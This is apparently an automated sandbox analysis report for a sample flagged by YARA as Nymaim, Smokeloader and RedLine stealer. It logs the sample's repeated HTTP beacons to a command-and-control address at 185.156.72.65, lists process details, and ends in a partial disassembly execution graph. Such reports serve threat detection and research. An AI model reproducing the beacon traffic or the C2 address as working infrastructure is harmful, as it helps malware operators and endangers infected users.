                    Nov 30, 2024 14:37:20.649873972 CET4973080192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:20.649966955 CET4973080192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:20.769876957 CET8049730185.156.72.65192.168.2.4
                    Nov 30, 2024 14:37:23.655289888 CET4973780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:23.775279999 CET8049737185.156.72.65192.168.2.4
                    Nov 30, 2024 14:37:23.775420904 CET4973780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:23.775619030 CET4973780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:23.895591974 CET8049737185.156.72.65192.168.2.4
                    Nov 30, 2024 14:37:45.703319073 CET8049737185.156.72.65192.168.2.4
                    Nov 30, 2024 14:37:45.703509092 CET4973780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:45.703509092 CET4973780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:45.823465109 CET8049737185.156.72.65192.168.2.4
                    Nov 30, 2024 14:37:48.717365026 CET4973880192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:48.837671041 CET8049738185.156.72.65192.168.2.4
                    Nov 30, 2024 14:37:48.837744951 CET4973880192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:48.837955952 CET4973880192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:48.957904100 CET8049738185.156.72.65192.168.2.4
                    Nov 30, 2024 14:37:56.865400076 CET4973880192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:59.875869036 CET4974680192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:59.996232033 CET8049746185.156.72.65192.168.2.4
                    Nov 30, 2024 14:37:59.996325016 CET4974680192.168.2.4185.156.72.65
                    Nov 30, 2024 14:37:59.996587992 CET4974680192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:00.278942108 CET8049746185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:21.947092056 CET8049746185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:21.947202921 CET4974680192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:21.947364092 CET4974680192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:22.067188978 CET8049746185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:25.048568010 CET4980780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:25.231853008 CET8049807185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:25.231957912 CET4980780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:25.236874104 CET4980780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:25.353130102 CET8049807185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:25.353193998 CET4980780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:25.354604006 CET4980780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:25.356749058 CET8049807185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:25.473031998 CET8049807185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:25.474409103 CET8049807185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:28.363244057 CET4981880192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:28.483133078 CET8049818185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:28.483258963 CET4981880192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:28.483419895 CET4981880192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:28.603288889 CET8049818185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:28.603395939 CET8049818185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:31.609476089 CET4982780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:31.730242968 CET8049827185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:31.732172966 CET4982780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:31.732388973 CET4982780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:31.852255106 CET8049827185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:48.577276945 CET4982780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:51.640172958 CET4987280192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:51.762959957 CET8049872185.156.72.65192.168.2.4
                    Nov 30, 2024 14:38:51.763065100 CET4987280192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:51.763457060 CET4987280192.168.2.4185.156.72.65
                    Nov 30, 2024 14:38:51.883841038 CET8049872185.156.72.65192.168.2.4
                    Nov 30, 2024 14:39:13.729058027 CET8049872185.156.72.65192.168.2.4
                    Nov 30, 2024 14:39:13.729590893 CET4987280192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:13.729821920 CET4987280192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:13.849663019 CET8049872185.156.72.65192.168.2.4
                    Nov 30, 2024 14:39:16.735932112 CET4987380192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:16.855829954 CET8049873185.156.72.65192.168.2.4
                    Nov 30, 2024 14:39:16.855926037 CET4987380192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:16.856372118 CET4987380192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:16.976598024 CET8049873185.156.72.65192.168.2.4
                    Nov 30, 2024 14:39:38.885831118 CET8049873185.156.72.65192.168.2.4
                    Nov 30, 2024 14:39:38.885941982 CET4987380192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:38.886128902 CET4987380192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:39.005974054 CET8049873185.156.72.65192.168.2.4
                    Nov 30, 2024 14:39:41.890808105 CET4987480192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:42.010761976 CET8049874185.156.72.65192.168.2.4
                    Nov 30, 2024 14:39:42.011106968 CET4987480192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:42.011497021 CET4987480192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:42.131408930 CET8049874185.156.72.65192.168.2.4
                    Nov 30, 2024 14:39:50.856987953 CET4987480192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:53.875592947 CET4987580192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:53.995712042 CET8049875185.156.72.65192.168.2.4
                    Nov 30, 2024 14:39:53.995945930 CET4987580192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:53.999810934 CET4987580192.168.2.4185.156.72.65
                    Nov 30, 2024 14:39:54.121088982 CET8049875185.156.72.65192.168.2.4
                    Nov 30, 2024 14:40:15.917762041 CET8049875185.156.72.65192.168.2.4
                    Nov 30, 2024 14:40:15.917949915 CET4987580192.168.2.4185.156.72.65
                    Nov 30, 2024 14:40:15.918093920 CET4987580192.168.2.4185.156.72.65
                    Nov 30, 2024 14:40:16.037909031 CET8049875185.156.72.65192.168.2.4
                    Nov 30, 2024 14:40:18.922983885 CET4987680192.168.2.4185.156.72.65
                    Nov 30, 2024 14:40:19.042881966 CET8049876185.156.72.65192.168.2.4
                    Nov 30, 2024 14:40:19.042953968 CET4987680192.168.2.4185.156.72.65
                    Nov 30, 2024 14:40:19.043276072 CET4987680192.168.2.4185.156.72.65
                    Nov 30, 2024 14:40:19.163348913 CET8049876185.156.72.65192.168.2.4
                    Nov 30, 2024 14:40:41.011645079 CET8049876185.156.72.65192.168.2.4
                    Nov 30, 2024 14:40:41.011704922 CET4987680192.168.2.4185.156.72.65
                    Nov 30, 2024 14:40:41.011868954 CET4987680192.168.2.4185.156.72.65
                    Nov 30, 2024 14:40:41.132460117 CET8049876185.156.72.65192.168.2.4
                    Nov 30, 2024 14:40:44.017632961 CET4987780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:40:44.137944937 CET8049877185.156.72.65192.168.2.4
                    Nov 30, 2024 14:40:44.142333031 CET4987780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:40:44.142576933 CET4987780192.168.2.4185.156.72.65
                    Nov 30, 2024 14:40:44.262634993 CET8049877185.156.72.65192.168.2.4
                    Nov 30, 2024 14:40:58.735168934 CET4987780192.168.2.4185.156.72.65

                    HTTP Request Dependency Graph

                    • 185.156.72.65

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449730185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:36:58.718892097 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449737185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:37:23.775619030 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.449738185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:37:48.837955952 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.449746185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:37:59.996587992 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.449807185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:38:25.236874104 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.449818185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:38:28.483419895 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.449827185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:38:31.732388973 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.449872185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:38:51.763457060 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.449873185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:39:16.856372118 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.449874185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:39:42.011497021 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.449875185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:39:53.999810934 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.449876185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:40:19.043276072 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.449877185.156.72.65806624C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Nov 30, 2024 14:40:44.142576933 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:08:36:54
                    Start date:30/11/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x400000
                    File size:2'024'448 bytes
                    MD5 hash:D2A93D9F269CBD3B444400D586999E01
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1671985450.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:1.6%
                      Dynamic/Decrypted Code Coverage:5.4%
                      Signature Coverage:3.6%
                      Total number of Nodes:557
                      Total number of Limit Nodes:4
                      execution_graph 29178 40a0b1 29179 40a0bd ___scrt_is_nonwritable_in_current_image 29178->29179 29206 409e11 29179->29206 29181 40a0c4 29182 40a217 29181->29182 29193 40a0ee ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 29181->29193 29233 40a58a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 29182->29233 29184 40a21e 29234 4106ab 21 API calls __CreateFrameInfo 29184->29234 29186 40a224 29235 41066f 21 API calls __CreateFrameInfo 29186->29235 29188 40a22c 29189 40a10d 29190 40a18e 29214 40a6a5 29190->29214 29193->29189 29193->29190 29232 410685 39 API calls 4 library calls 29193->29232 29207 409e1a 29206->29207 29236 40a2ec IsProcessorFeaturePresent 29207->29236 29209 409e26 29237 40b77d 10 API calls 2 library calls 29209->29237 29211 409e2f 29211->29181 29212 409e2b 29212->29211 29238 40b79c 7 API calls 2 library calls 29212->29238 29239 40b570 29214->29239 29217 40a194 29218 412288 29217->29218 29241 41816d 29218->29241 29220 412291 29221 40a19c 29220->29221 29247 41841d 39 API calls 29220->29247 29223 4087e0 29221->29223 29250 402460 29223->29250 29226 402460 43 API calls 29227 408807 29226->29227 29254 405a50 29227->29254 29232->29190 29233->29184 29234->29186 29235->29188 29236->29209 29237->29212 29238->29211 29240 40a6b8 GetStartupInfoW 29239->29240 29240->29217 29242 4181a8 29241->29242 29243 418176 29241->29243 29242->29220 29248 41299d 39 API calls 3 library calls 29243->29248 29245 418199 29249 417f78 49 API calls 3 library calls 29245->29249 29247->29220 29248->29245 29249->29242 29251 402483 29250->29251 29251->29251 29569 402760 29251->29569 29253 402495 29253->29226 29596 410822 GetSystemTimeAsFileTime 29254->29596 29256 405a9f 29598 4106e2 29256->29598 29259 402760 43 API calls 29260 405ada 29259->29260 29261 402760 43 API calls 29260->29261 29262 405ca0 29261->29262 29601 403ab0 29262->29601 29264 405e9f 29613 406c40 29264->29613 29266 40620c 29267 402460 43 API calls 29266->29267 29268 40621c 29267->29268 29623 402390 29268->29623 29270 406230 29631 406ee0 29270->29631 29272 40630a 29273 402460 43 API calls 29272->29273 29274 40631a 29273->29274 29275 402390 39 API calls 29274->29275 29276 40632e 29275->29276 29277 406404 29276->29277 29278 406336 29276->29278 29694 407290 53 API calls 2 library calls 29277->29694 29686 406f60 53 API calls 2 library calls 29278->29686 29281 40633b 29283 402460 43 API calls 29281->29283 29282 406409 29284 402460 43 API calls 29282->29284 29285 40634b 29283->29285 29286 406419 29284->29286 29687 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29285->29687 29290 402390 39 API calls 29286->29290 29288 406354 29289 402390 39 API calls 29288->29289 29291 40635c 29289->29291 29292 40642d 29290->29292 29688 406ff0 53 API calls 2 library calls 29291->29688 29294 4064ee 29292->29294 29695 407310 53 API calls 2 library calls 29292->29695 29703 407630 53 API calls 2 library calls 29294->29703 29296 406361 29300 402460 43 API calls 29296->29300 29298 40643a 29301 402460 43 API calls 29298->29301 29299 4064f8 29302 402460 43 API calls 29299->29302 29303 406371 29300->29303 29305 40644a 29301->29305 29306 406508 29302->29306 29689 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29303->29689 29696 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29305->29696 29313 402390 39 API calls 29306->29313 29307 40637a 29309 402390 39 API calls 29307->29309 29311 406382 29309->29311 29310 406453 29312 402390 39 API calls 29310->29312 29690 407070 53 API calls 2 library calls 29311->29690 29315 40645b 29312->29315 29316 40651c 29313->29316 29697 407390 53 API calls 2 library calls 29315->29697 29319 406603 29316->29319 29704 4076b0 53 API calls 2 library calls 29316->29704 29317 406387 29325 402460 43 API calls 29317->29325 29714 407a50 53 API calls 2 library calls 29319->29714 29321 406460 29327 402460 43 API calls 29321->29327 29323 40660d 29328 402460 43 API calls 29323->29328 29324 406529 29330 402460 43 API calls 29324->29330 29326 406397 29325->29326 29336 402390 39 API calls 29326->29336 29329 406470 29327->29329 29332 40661d 29328->29332 29698 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29329->29698 29331 406539 29330->29331 29705 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29331->29705 29344 402390 39 API calls 29332->29344 29334 406479 29337 402390 39 API calls 29334->29337 29339 4063ab 29336->29339 29340 406481 29337->29340 29338 406542 29341 402390 39 API calls 29338->29341 29342 4063cc 29339->29342 29343 4063af 29339->29343 29699 407410 53 API calls 2 library calls 29340->29699 29347 40654a 29341->29347 29692 407180 53 API calls 2 library calls 29342->29692 29691 407100 53 API calls 2 library calls 29343->29691 29345 406631 29344->29345 29351 4066b3 29345->29351 29352 406635 29345->29352 29706 407730 53 API calls 2 library calls 29347->29706 29350 4063b4 29361 402460 43 API calls 29350->29361 29721 407c70 53 API calls 2 library calls 29351->29721 29715 407ae0 53 API calls 2 library calls 29352->29715 29353 406486 29362 402460 43 API calls 29353->29362 29355 4063d1 29363 402460 43 API calls 29355->29363 29358 40654f 29366 402460 43 API calls 29358->29366 29359 4066b8 29368 402460 43 API calls 29359->29368 29360 40663a 29369 402460 43 API calls 29360->29369 29364 4063c4 29361->29364 29365 406496 29362->29365 29367 4063e1 29363->29367 29740 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29364->29740 29377 402390 39 API calls 29365->29377 29370 40655f 29366->29370 29379 402390 39 API calls 29367->29379 29372 4066c8 29368->29372 29373 40664a 29369->29373 29707 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29370->29707 29386 402390 39 API calls 29372->29386 29716 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29373->29716 29375 406875 29380 402390 39 API calls 29375->29380 29382 4064aa 29377->29382 29378 406568 29383 402390 39 API calls 29378->29383 29384 4063f5 29379->29384 29385 4066a7 29380->29385 29381 406653 29387 402390 39 API calls 29381->29387 29388 4064b8 29382->29388 29389 4064ae 29382->29389 29390 406570 29383->29390 29384->29385 29693 407210 53 API calls 2 library calls 29384->29693 29641 4017a0 29385->29641 29393 4066dc 29386->29393 29394 40665b 29387->29394 29701 407520 53 API calls 2 library calls 29388->29701 29700 4074a0 53 API calls 2 library calls 29389->29700 29708 4077b0 53 API calls 2 library calls 29390->29708 29400 4066e0 29393->29400 29401 40675e 29393->29401 29717 407b60 53 API calls 2 library calls 29394->29717 29397 406575 29410 402460 43 API calls 29397->29410 29398 4064bd 29411 402460 43 API calls 29398->29411 29722 407d00 53 API calls 2 library calls 29400->29722 29728 407e80 53 API calls 2 library calls 29401->29728 29403 4068a1 29645 4083f0 29403->29645 29406 406660 29413 402460 43 API calls 29406->29413 29408 406763 29419 402460 43 API calls 29408->29419 29409 4066e5 29416 402460 43 API calls 29409->29416 29414 406585 29410->29414 29415 4064cd 29411->29415 29412 4068aa 29424 402460 43 API calls 29412->29424 29417 406670 29413->29417 29709 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29414->29709 29428 402390 39 API calls 29415->29428 29421 4066f5 29416->29421 29718 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29417->29718 29420 406773 29419->29420 29436 402390 39 API calls 29420->29436 29723 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29421->29723 29423 40658e 29427 402390 39 API calls 29423->29427 29429 4068bd 29424->29429 29426 406679 29432 402390 39 API calls 29426->29432 29433 406596 29427->29433 29434 4064e1 29428->29434 29655 408370 29429->29655 29431 4066fe 29437 402390 39 API calls 29431->29437 29438 406681 29432->29438 29710 407830 53 API calls 2 library calls 29433->29710 29434->29385 29702 4075b0 53 API calls 2 library calls 29434->29702 29435 4068c8 29449 402460 43 API calls 29435->29449 29440 406787 29436->29440 29441 406706 29437->29441 29719 407bf0 53 API calls 2 library calls 29438->29719 29445 40678b 29440->29445 29446 4067de 29440->29446 29724 407d80 53 API calls 2 library calls 29441->29724 29443 40659b 29455 402460 43 API calls 29443->29455 29729 407f10 53 API calls 2 library calls 29445->29729 29734 4080d0 53 API calls 2 library calls 29446->29734 29448 406686 29458 402460 43 API calls 29448->29458 29453 4068db 29449->29453 29451 40670b 29461 402460 43 API calls 29451->29461 29665 4082d0 29453->29665 29454 406790 29464 402460 43 API calls 29454->29464 29459 4065ab 29455->29459 29456 4067e3 29463 402460 43 API calls 29456->29463 29462 406696 29458->29462 29467 402390 39 API calls 29459->29467 29460 4068e6 29473 402460 43 API calls 29460->29473 29465 40671b 29461->29465 29720 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29462->29720 29468 4067f3 29463->29468 29469 4067a0 29464->29469 29725 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29465->29725 29472 4065bf 29467->29472 29482 402390 39 API calls 29468->29482 29730 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29469->29730 29471 40669f 29476 402390 39 API calls 29471->29476 29477 4065c8 29472->29477 29711 4078c0 53 API calls 2 library calls 29472->29711 29478 4068f9 29473->29478 29475 406724 29480 402390 39 API calls 29475->29480 29476->29385 29712 407940 53 API calls 2 library calls 29477->29712 29675 408da0 29478->29675 29479 4067a9 29485 402390 39 API calls 29479->29485 29486 40672c 29480->29486 29488 406807 29482->29488 29491 4067b1 29485->29491 29726 407e00 53 API calls 2 library calls 29486->29726 29488->29385 29735 408150 53 API calls 2 library calls 29488->29735 29489 4065d2 29500 402460 43 API calls 29489->29500 29731 407fd0 53 API calls 2 library calls 29491->29731 29493 406731 29502 402460 43 API calls 29493->29502 29495 4067b6 29505 402460 43 API calls 29495->29505 29497 406926 29683 408eb0 29497->29683 29499 406810 29510 402460 43 API calls 29499->29510 29503 4065e2 29500->29503 29506 406741 29502->29506 29511 402390 39 API calls 29503->29511 29504 408e00 43 API calls 29507 406953 29504->29507 29508 4067c6 29505->29508 29727 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29506->29727 29512 408eb0 43 API calls 29507->29512 29732 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29508->29732 29515 406820 29510->29515 29516 4065f6 